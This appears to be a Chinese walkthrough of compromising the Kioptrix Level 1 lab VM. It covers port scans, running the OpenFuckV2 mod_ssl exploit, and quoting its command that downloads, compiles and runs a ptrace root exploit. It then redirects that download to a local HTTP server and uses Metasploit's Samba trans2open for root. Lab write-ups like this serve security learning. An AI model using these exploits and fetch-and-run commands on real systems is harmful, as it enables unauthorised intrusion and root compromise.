Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。

解决方式:每次下载好靶机先不导入VM,如果已经导入,需要“移除”靶机;然后通过修改靶机目录中的vm配置文件,删除所有ethernet0为首的行,之后,导入VM中,重新添加网络适配器并选择NAT模式,这样kali就能扫描到靶机了

kali IP:192.168.1.128

靶机IP:192.168.1.130

sudo nmap --min-rate 10000 -p- 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:27 CST

Nmap scan report for 192.168.1.130

Host is up (0.0023s latency).

Not shown: 65529 closed tcp ports (reset)

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

111/tcp  open  rpcbind

139/tcp  open  netbios-ssn

443/tcp  open  https

1024/tcp open  kdm


sudo nmap -sT -sV -O -p22,80,111,139,443,1024 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:40 CST

Nmap scan report for 192.168.1.130

Host is up (0.00036s latency).

PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)

80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp  open  rpcbind     2 (RPC #100000)

139/tcp  open  netbios-ssn Samba smbd (workgroup: yMYGROUP)

443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

1024/tcp open  status      1 (RPC #100024)

MAC Address: 00:0C:29:7C:3A:16 (VMware)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Linux 2.4.X

OS CPE: cpe:/o:linux:linux_kernel:2.4

OS details: Linux 2.4.9 - 2.4.18 (likely embedded)

Network Distance: 1 hop

mod_ssl,OpenSSL,rpcbind,Samba 都可以进行尝试

搜索了一下rpcbind只有拒绝服务。

sudo nmap -sU -p22,80,111,139,443,1024 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:42 CST

Nmap scan report for 192.168.1.130

Host is up (0.00025s latency).

PORT     STATE  SERVICE

22/udp   closed ssh

80/udp   closed http

111/udp  open   rpcbind

139/udp  closed netbios-ssn

443/udp  closed https

1024/udp closed unknown

UDP扫描一下有没有遗漏的服务

访问80端口和443端口,发现网络架构相同,和nmap扫描出的服务相同。

扫描目录:

sudo dirb http://192.168.1.130

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Fri Aug 18 10:18:03 2023

URL_BASE: http://192.168.1.130/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.130/ ----

+ http://192.168.1.130/~operator (CODE:403|SIZE:273)

+ http://192.168.1.130/~root (CODE:403|SIZE:269)

+ http://192.168.1.130/cgi-bin/ (CODE:403|SIZE:272)

+ http://192.168.1.130/index.html (CODE:200|SIZE:2890)

==> DIRECTORY: http://192.168.1.130/manual/

==> DIRECTORY: http://192.168.1.130/mrtg/

==> DIRECTORY: http://192.168.1.130/usage/                                                                                  

---- Entering directory: http://192.168.1.130/manual/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.130/mrtg/ ----

+ http://192.168.1.130/mrtg/index.html (CODE:200|SIZE:17318)                                                                

---- Entering directory: http://192.168.1.130/usage/ ----

+ http://192.168.1.130/usage/index.html (CODE:200|SIZE:4261)

radhat的默认首页和配置文档 没有利用点

看了一下apache 1.3.20有什么漏洞可以利用

searchsploit apache 1.3.20

mod_ssl=2.8.4<2.8.7,尝试使用

searchsploit -m 47080.c

  Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)

      URL: https://www.exploit-db.com/exploits/47080

     Path: /usr/share/exploitdb/exploits/unix/remote/47080.c

File Type: C source, ASCII text

gcc -o exploit 47080.c -lcrypto

47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录

   21 | #include <openssl/ssl.h>

      |          ^~~~~~~~~~~~~~~

compilation terminated.

下载依赖库之后重新编译

exploit中符合要求有0x6a,0x6b

sudo ./exploit 0x6a 192.168.1.130 -c 50

*******************************************************************

* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *

*******************************************************************

* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *

* #hackarena  irc.brasnet.org                                     *

* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *

* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *

* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

*******************************************************************

Connection... 50 of 50

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80f8068

Ready to send shellcode

Spawning shell...

Good Bye!

 sudo ./exploit 0x6b 192.168.1.130 -c 50

*******************************************************************

* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *

*******************************************************************

* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *

* #hackarena  irc.brasnet.org                                     *

* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *

* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *

* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

*******************************************************************

Connection... 50 of 50

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80f8068

Ready to send shellcode

Spawning shell...


bash: no job control in this shell

bash-2.05$

d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo

--23:19:52--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

           => `ptrace-kmod.c'

Connecting to dl.packetstormsecurity.net:443...

dl.packetstormsecurity.net: Host not found.

gcc: ptrace-kmod.c: No such file or directory

gcc: No input files

rm: cannot remove `ptrace-kmod.c': No such file or directory

bash: ./exploit: No such file or directory

bash-2.05$

检查权限

uname -a

Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

whoami;id

apache

uid=48(apache) gid=48(apache) groups=48(apache)

百度说是这个.c文件获取外网文件被墙 导致获取的不是root权限

Samba尝试 尝试了下 只有最有一个对139端口进行攻击 其他的利用模块都是针对mamba的服务端口443进行攻击的

use exploit/linux/samba/

Matching Modules

================

   #  Name                                     Disclosure Date  Rank       Check  Description

   -  ----                                     ---------------  ----       -----  -----------

   0  exploit/linux/samba/setinfopolicy_heap   2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow

   1  exploit/linux/samba/chain_reply          2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)

   2  exploit/linux/samba/is_known_pipename    2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load

   3  exploit/linux/samba/lsa_transnames_heap  2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow

   4  exploit/linux/samba/trans2open           2003-04-07       great      No     Samba trans2open Overflow (Linux x86)

一般来说 系统赋予smb服务为root权限

samba/setinfopolicy_heap 信息策略审计时间堆溢出

Samba chain_reply内存损坏漏洞:该漏洞利用代码会损坏Samba 3.3.13以前版本中分配给响应数据包的内存,可通过传递超过目标缓冲区大小的值实现。

samba/is_known_pipename CVE-2017-7494,Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。Samba 允许连接一个远程的命名管道,并且在连接前会调用 is_known_pipename() 函数验证管道名称是否合法。在 is_known_pipename() 函数中,pipename并没有检查管道名称中的部分特殊字符,加载了使用该名称的动态链接库。导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码。

Samba lsa_io_trans_names Heap Overflow 堆溢出

Samba trans2open溢出:这是Samba2.2.0版本到2.2.8版本中普遍存在的一个缓冲区溢出漏洞,其工作原理是利用没有noexec栈选项的x86 Linux机器中的漏洞。

配置好后run借助samba直接能拿到root权限

继续之前的mod_ssl进行,根据网上的思路 可以在128访问外网下载 exploit中130需访问的外网文件,通过更改exploit中,使130访问128临时开启的80端口下载文件,执行expoit获取root权限。

nl 47080.c|grep ptrace

    8   * Note: if required, host ptrace and replace wget target

  308  #define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; \n"

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

--2023-08-18 09:29:59--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

正在解析主机 dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200

正在连接 dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... 已连接。

已发出 HTTP 请求,正在等待回应... 200 OK

长度:3921 (3.8K) [text/x-csrc]

正在保存至: “ptrace-kmod.c”

ptrace-kmod.c                      100%[================================================================>]   3.83K  --.-KB/s  用时 0s      

2023-08-18 09:30:01 (131 MB/s) - 已保存 “ptrace-kmod.c” [3921/3921])

编写 47080.c ,然后重新编译,临时开启128的80服务,同时执行exploit

python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

192.168.1.130 - - [18/Aug/2023 09:37:16] "GET /ptrace-kmod.c HTTP/1.0" 200 -

Kioptrix Level 1的更多相关文章

  1. Kioptrix Level 2

    简介 Vulnhub是一个提供各种漏洞环境的靶场平台. 个人学习目的:1,方便学习更多类型漏洞.2,为OSCP做打基础. 下载链接 https://www.vulnhub.com/entry/kiop ...

  2. vulnhub 靶机 Kioptrix Level 1渗透笔记

    靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ kali ip 信息收集 先使用nmap收集目标的ip地址 nmap -sP 1 ...

  3. OSCP Learning Notes - Enumeration(1)

    Installing Kioptrix: Level 1 Download the vm machine form https://www.vulnhub.com/entry/kioptrix-lev ...

  4. OSCP Learning Notes - Exploit(1)

    Gaining Root with Metasploit Platform: Kali Linux, Kioptrix Level 1 1. Find the IP of Kioptirx nmap ...

  5. OSCP Learning Notes - Capstone(1)

    Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine  from the following website ...

  6. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  7. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  8. OSCP Learning Notes - File Transfers(2)

    Metasploit Target Server: Kioptrix Level 1 (1) Start the Metasploit on Kali Linux. (2) Set the modul ...

  9. Java compiler level does not match解决方法

    从别的地方导入一个项目的时候,经常会遇到eclipse/Myeclipse报Description  Resource Path Location Type Java compiler level d ...

  10. Android requires compiler compliance level 5.0 or 6.0. Found '1.4' instead的解决办法

    今天在导入工程进Eclipse的时候竟然出错了,控制台输出的是: [2013-02-04 22:17:13 - takepicture] Android requires compiler compl ...

随机推荐

  1. Python-3.10安装步骤

    下载地址: https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe 安装:   C:\Users\liujun>pyth ...

  2. java通用xls导出设计

    背景 在后端日常开发中总会有各种各样的导出需求,实现这个需求必须要解决的两个问题: 1.表头不能直接使用字段名,需要显示为中文,甚至还需要考虑国际化 2.值需要翻译,比如性别.状态之类的字段 现状 现 ...

  3. 音容笑貌,两臻佳妙,人工智能AI换脸(deepfake)技术复刻《卡萨布兰卡》名场面(Python3.10)

    影史经典<卡萨布兰卡>是大家耳熟能详的传世名作,那一首壮怀激烈,激奋昂扬的马赛曲,应当是通片最为激动人心的经典桥段了,本次我们基于faceswap和so-vits库让AI川普复刻美国演员保 ...

  4. Github疯传!谷歌师兄的LeetCode刷题笔记开源了!

    有小伙伴私聊我说刚开始刷LeetCode的时候,感到很吃力,刷题效率很低.我以前刷题的时候也遇到这个问题,直到后来看到这个谷歌师兄总结的刷题笔记,发现LeetCode刷题都是套路呀,掌握这些套路之后, ...

  5. vs2022的一些调试技巧——远程调试&线程检查&性能检查

    visual studio一直都是.net/c#开发人员最受欢迎的编译器,除了强大的代码提示和项目模板,还拥有大量的调试工具,这一期我们介绍下code freeze阶段的一些调试技巧.包括测试环境/生 ...

  6. Helm实战案例一:在Kubernetes上使用Helm搭建Prometheus Operator监控

    目录 一.系统环境 二.前言 三.Prometheus Operator简介 四.helm安装prometheus-operator 五.配置prometheus-operator 5.1 修改gra ...

  7. CMU15445 (Fall 2020) 数据库系统 Project#4 - Concurrency Control 详解

    前言 一个合格的事务处理系统,应该具备四个性质:原子性(atomicity).一致性(consistency).隔离性(isolation)和持久性(durability).隔离性保证了一个活跃的事务 ...

  8. 【Linux内核】内核源码编译

    Linux内核源码编译过程 总体流程: 下载Linux内核源码文件 安装所需工具 解压源码文件并配置 make编译源码 下载busybox 配置busybox并编译 1. Linux源码编译 http ...

  9. GPT3的内部结构:基于自回归、注意力机制等技术的语言处理框架

    目录 1. 引言 2. 技术原理及概念 3. 实现步骤与流程 4. 应用示例与代码实现讲解 6. 结论与展望 7. 附录:常见问题与解答 GPT-3 是当前最为先进的自然语言处理框架之一,由 Open ...

  10. NextJS项目的部署以及多环境的实现

    背景 开发了个Next项目,将部署过程记录一下.另外由于项目准备了两个服务器分别作为开发自测的开发环境和交付给客户的生产环境使用:因此也介绍一下NextJS项目中多环境的配置. 项目结构 计划是让Ng ...